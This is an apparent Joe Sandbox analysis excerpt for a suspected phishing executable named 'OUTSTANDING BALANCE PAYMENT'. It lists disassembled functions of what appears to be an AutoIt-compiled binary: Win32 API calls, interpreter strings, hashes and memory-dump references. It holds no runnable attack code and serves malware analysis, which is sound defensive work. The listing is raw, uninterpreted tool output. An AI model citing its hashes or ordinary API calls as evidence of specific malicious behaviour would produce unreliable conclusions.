                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                          • String ID: 0
                                                          • API String ID: 464785882-4108050209
                                                          • Opcode ID: 3fdf22ee2bc41cff5196d69c33c3191e24dca5282c489ae92b5f49db4707a8e6
                                                          • Instruction ID: cdfa524e7b20c88522b62313cfc93661767bbd96e333657b7c9a60bb75dccb30
                                                          • Opcode Fuzzy Hash: 3fdf22ee2bc41cff5196d69c33c3191e24dca5282c489ae92b5f49db4707a8e6
                                                          • Instruction Fuzzy Hash: 98128C30204241DFDB15CF24C884BA9BBE5FF55314F1485AAEAA9DB262DB31EC45CF91
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00BADBD6
                                                          • GetDriveTypeW.KERNEL32(?,00BFDC54,?,\\.\,00BFDC00), ref: 00BADCC3
                                                          • SetErrorMode.KERNEL32(00000000,00BFDC54,?,\\.\,00BFDC00), ref: 00BADE29
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DriveType
                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                          • API String ID: 2907320926-4222207086
                                                          • Opcode ID: aed8a0d91163663887b83d49395a29487e17b302f47fb2cdd409b9bd58d1acb8
                                                          • Instruction ID: 547b1355f25153ad0e1d955f8dbb475857118f6e88cc936417ebbfcccb8e1a57
                                                          • Opcode Fuzzy Hash: aed8a0d91163663887b83d49395a29487e17b302f47fb2cdd409b9bd58d1acb8
                                                          • Instruction Fuzzy Hash: 2E51B73024C341EBC710DF14C8D1969B7E1FB5B708B1449BAF4979B691EB70DA89E742
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                          • API String ID: 1038674560-86951937
                                                          • Opcode ID: 78f33046078dd9c9ec1ca8a177e17ce5395b681e1aed292d30169e91846d9d3d
                                                          • Instruction ID: 44bd64fa77fa4330d0bc6f288500ea474370f8087828e3b949c61e0279a73108
                                                          • Opcode Fuzzy Hash: 78f33046078dd9c9ec1ca8a177e17ce5395b681e1aed292d30169e91846d9d3d
                                                          • Instruction Fuzzy Hash: 5C81F531640209ABCB10AF64CC83FBE7BE9EF24300F0444F9F949AB292FB65D945C691
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00BCC788
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00BCC83E
                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 00BCC859
                                                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00BCCB15
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: 0
                                                          • API String ID: 2326795674-4108050209
                                                          • Opcode ID: 9778824ca71bf4403106db5902e6394df4952b4df72f77e420ec08fbaf0c023f
                                                          • Instruction ID: e91c86212f09086eb323e9f8be20944b41d9e3754cf1ee97860bb0ce072c6d4f
                                                          • Opcode Fuzzy Hash: 9778824ca71bf4403106db5902e6394df4952b4df72f77e420ec08fbaf0c023f
                                                          • Instruction Fuzzy Hash: ABF1AA71204345AFE7218F24C889FAABFE4FF69354F0846ADF59DD62A1C7748841CB92
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,00BFDC00), ref: 00BC6449
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                          • API String ID: 3964851224-45149045
                                                          • Opcode ID: 1dccc7e5985d5bd6c376ecf91a74fc01a62ad120f0b8059a47db5a1212309e17
                                                          • Instruction ID: b50e6115fdb15bcbdb5d7dc3b32dae2c3e66e473508eaacb91c785e01b3d91bf
                                                          • Opcode Fuzzy Hash: 1dccc7e5985d5bd6c376ecf91a74fc01a62ad120f0b8059a47db5a1212309e17
                                                          • Instruction Fuzzy Hash: 5BC153742042458BCE05EF14C591EAE77D9EF95344F1488EDF89A9B3D2DB20ED4ACB82
                                                          APIs
                                                          • GetSysColor.USER32(00000012), ref: 00BCD5AE
                                                          • SetTextColor.GDI32(?,?), ref: 00BCD5B2
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00BCD5C8
                                                          • GetSysColor.USER32(0000000F), ref: 00BCD5D3
                                                          • CreateSolidBrush.GDI32(?), ref: 00BCD5D8
                                                          • GetSysColor.USER32(00000011), ref: 00BCD5F0
                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BCD5FE
                                                          • SelectObject.GDI32(?,00000000), ref: 00BCD60F
                                                          • SetBkColor.GDI32(?,00000000), ref: 00BCD618
                                                          • SelectObject.GDI32(?,?), ref: 00BCD625
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00BCD644
                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BCD65B
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00BCD670
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BCD698
                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00BCD6BF
                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00BCD6DD
                                                          • DrawFocusRect.USER32(?,?), ref: 00BCD6E8
                                                          • GetSysColor.USER32(00000011), ref: 00BCD6F6
                                                          • SetTextColor.GDI32(?,00000000), ref: 00BCD6FE
                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00BCD712
                                                          • SelectObject.GDI32(?,00BCD2A5), ref: 00BCD729
                                                          • DeleteObject.GDI32(?), ref: 00BCD734
                                                          • SelectObject.GDI32(?,?), ref: 00BCD73A
                                                          • DeleteObject.GDI32(?), ref: 00BCD73F
                                                          • SetTextColor.GDI32(?,?), ref: 00BCD745
                                                          • SetBkColor.GDI32(?,?), ref: 00BCD74F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 1996641542-0
                                                          • Opcode ID: b8e8422eb989717a51bfe9f2fdcd008c8982851fec98707c2a65ec15922a5a13
                                                          • Instruction ID: e399a403c3bca4bbb702253f2789f21f57bd708a7d73dc8f4f745dc8e0598358
                                                          • Opcode Fuzzy Hash: b8e8422eb989717a51bfe9f2fdcd008c8982851fec98707c2a65ec15922a5a13
                                                          • Instruction Fuzzy Hash: 64514F75900248BFDF109FA4DC88EAE7BB9FF08324F114565F915AB2A1DBB59A40CF50
                                                          APIs
                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00BCB7B0
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BCB7C1
                                                          • CharNextW.USER32(0000014E), ref: 00BCB7F0
                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00BCB831
                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00BCB847
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BCB858
                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00BCB875
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00BCB8C7
                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00BCB8DD
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BCB90E
                                                          • _memset.LIBCMT ref: 00BCB933
                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00BCB97C
                                                          • _memset.LIBCMT ref: 00BCB9DB
                                                          • SendMessageW.USER32 ref: 00BCBA05
                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00BCBA5D
                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00BCBB0A
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00BCBB2C
                                                          • GetMenuItemInfoW.USER32(?), ref: 00BCBB76
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BCBBA3
                                                          • DrawMenuBar.USER32(?), ref: 00BCBBB2
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00BCBBDA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                          • String ID: 0
                                                          • API String ID: 1073566785-4108050209
                                                          • Opcode ID: ee8645fe9502f8bcc3a4b1520c288b9a33ff8a1a086aba6982f114b5b5c56e6c
                                                          • Instruction ID: a505516cb771a5149b7b7e41fe48e934aa5fb597a200752351e39abbcac2bd32
                                                          • Opcode Fuzzy Hash: ee8645fe9502f8bcc3a4b1520c288b9a33ff8a1a086aba6982f114b5b5c56e6c
                                                          • Instruction Fuzzy Hash: 30E15E75900258AFDF209FA5CC86FEE7BB8EF05714F14819AF919AB190DB708A41DF60
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00BC778A
                                                          • GetDesktopWindow.USER32 ref: 00BC779F
                                                          • GetWindowRect.USER32(00000000), ref: 00BC77A6
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00BC7808
                                                          • DestroyWindow.USER32(?), ref: 00BC7834
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BC785D
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BC787B
                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00BC78A1
                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00BC78B6
                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00BC78C9
                                                          • IsWindowVisible.USER32(?), ref: 00BC78E9
                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00BC7904
                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00BC7918
                                                          • GetWindowRect.USER32(?,?), ref: 00BC7930
                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00BC7956
                                                          • GetMonitorInfoW.USER32 ref: 00BC7970
                                                          • CopyRect.USER32(?,?), ref: 00BC7987
                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00BC79F2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                          • String ID: ($0$tooltips_class32
                                                          • API String ID: 698492251-4156429822
                                                          • Opcode ID: 6702cecd7c2cdee97959c83c9bbba0c1b275f9130222b4fb85127bf77c54f8e1
                                                          • Instruction ID: 19542ba2d65544b9171c72cbf0d6a430a044c748471c06c8b27b8989fb83471a
                                                          • Opcode Fuzzy Hash: 6702cecd7c2cdee97959c83c9bbba0c1b275f9130222b4fb85127bf77c54f8e1
                                                          • Instruction Fuzzy Hash: 6AB15771608340AFDB04DF65C989F6ABBE5FF88310F00895DF5999B291DBB4E804CB92
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00BA6CFB
                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00BA6D21
                                                          • _wcscpy.LIBCMT ref: 00BA6D4F
                                                          • _wcscmp.LIBCMT ref: 00BA6D5A
                                                          • _wcscat.LIBCMT ref: 00BA6D70
                                                          • _wcsstr.LIBCMT ref: 00BA6D7B
                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00BA6D97
                                                          • _wcscat.LIBCMT ref: 00BA6DE0
                                                          • _wcscat.LIBCMT ref: 00BA6DE7
                                                          • _wcsncpy.LIBCMT ref: 00BA6E12
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                          • API String ID: 699586101-1459072770
                                                          • Opcode ID: 77cab9006b2b37c36633455eca6ec4c5adfcef212a69faf5c8605c1a23f8ea20
                                                          • Instruction ID: 1dbfe6525c0f8862cfd7966143316584c23a619459cc749334ab601b36c8e0ea
                                                          • Opcode Fuzzy Hash: 77cab9006b2b37c36633455eca6ec4c5adfcef212a69faf5c8605c1a23f8ea20
                                                          • Instruction Fuzzy Hash: AC41E5B2604205BBEB00BB64CC47EBF77FCEF52750F0400A5F905A6192EA749A05D7A5
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B7A939
                                                          • GetSystemMetrics.USER32(00000007), ref: 00B7A941
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B7A96C
                                                          • GetSystemMetrics.USER32(00000008), ref: 00B7A974
                                                          • GetSystemMetrics.USER32(00000004), ref: 00B7A999
                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B7A9B6
                                                          • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00B7A9C6
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B7A9F9
                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B7AA0D
                                                          • GetClientRect.USER32(00000000,000000FF), ref: 00B7AA2B
                                                          • GetStockObject.GDI32(00000011), ref: 00B7AA47
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B7AA52
                                                            • Part of subcall function 00B7B63C: GetCursorPos.USER32(000000FF), ref: 00B7B64F
                                                            • Part of subcall function 00B7B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00B7B66C
                                                            • Part of subcall function 00B7B63C: GetAsyncKeyState.USER32(00000001), ref: 00B7B691
                                                            • Part of subcall function 00B7B63C: GetAsyncKeyState.USER32(00000002), ref: 00B7B69F
                                                          • SetTimer.USER32(00000000,00000000,00000028,00B7AB87), ref: 00B7AA79
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                          • String ID: AutoIt v3 GUI$mmmmmm
                                                          • API String ID: 1458621304-3582652670
                                                          • Opcode ID: 4f932a661aab69abcc88ee888d5e2c65b8686b79fb80f07f30c001f6016fe7fa
                                                          • Instruction ID: 387ff441f386b70ee65a97ba7308fd713d2a260b70b33c01fa6c72118714ddfe
                                                          • Opcode Fuzzy Hash: 4f932a661aab69abcc88ee888d5e2c65b8686b79fb80f07f30c001f6016fe7fa
                                                          • Instruction Fuzzy Hash: 1BB1BD71A0020A9FDB14DFA8CC85BAE7BF4FB58311F158269FA19AB2D0DB74D841CB51
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$Foreground
                                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                          • API String ID: 62970417-1919597938
                                                          • Opcode ID: e307b4a2daf099a1851d8b9578f4c06348989499c5555b6dd4c9cc7314348c82
                                                          • Instruction ID: ef5161cc032e4b61d6fb0571400a451aa0db022a0acac79ce1868abd560eb7b7
                                                          • Opcode Fuzzy Hash: e307b4a2daf099a1851d8b9578f4c06348989499c5555b6dd4c9cc7314348c82
                                                          • Instruction Fuzzy Hash: 79D1DA30508682DFCB04EF24C4819AAFBF4FF64340F0049DAF45A57661EB74E9AADB91
                                                          APIs
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BC3735
                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00BFDC00,00000000,?,00000000,?,?), ref: 00BC37A3
                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00BC37EB
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00BC3874
                                                          • RegCloseKey.ADVAPI32(?), ref: 00BC3B94
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00BC3BA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectCreateRegistryValue
                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                          • API String ID: 536824911-966354055
                                                          • Opcode ID: 8d8590a12b67c96f07fdb4ad675a7226ee408ce0c99a41b72f8c1095922c14d5
                                                          • Instruction ID: d450ac48b7c5932b826540929a3f87b84af6f4e77039eab7ad46f2df1793ec38
                                                          • Opcode Fuzzy Hash: 8d8590a12b67c96f07fdb4ad675a7226ee408ce0c99a41b72f8c1095922c14d5
                                                          • Instruction Fuzzy Hash: D5025A756046019FCB14EF24C895E2AB7E5FF89720F04849DF99A9B3A2CB34ED05CB85
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00BC6C56
                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00BC6D16
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                          • API String ID: 3974292440-719923060
                                                          • Opcode ID: 5a8e20a9dd97b63a8615c76cf122625143403c23f3d999ec4812c8aafd89fa62
                                                          • Instruction ID: 9feebcec7b664157e2d0506c750446a799200cf646d26afc53286bb0bf3f5715
                                                          • Opcode Fuzzy Hash: 5a8e20a9dd97b63a8615c76cf122625143403c23f3d999ec4812c8aafd89fa62
                                                          • Instruction Fuzzy Hash: B9A14D742142419BCB14EF24C991F6AB3E9EF55314F1489EDB86A9B2D2DB30ED0ACB41
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00B9CF91
                                                          • __swprintf.LIBCMT ref: 00B9D032
                                                          • _wcscmp.LIBCMT ref: 00B9D045
                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B9D09A
                                                          • _wcscmp.LIBCMT ref: 00B9D0D6
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00B9D10D
                                                          • GetDlgCtrlID.USER32(?), ref: 00B9D15F
                                                          • GetWindowRect.USER32(?,?), ref: 00B9D195
                                                          • GetParent.USER32(?), ref: 00B9D1B3
                                                          • ScreenToClient.USER32(00000000), ref: 00B9D1BA
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00B9D234
                                                          • _wcscmp.LIBCMT ref: 00B9D248
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00B9D26E
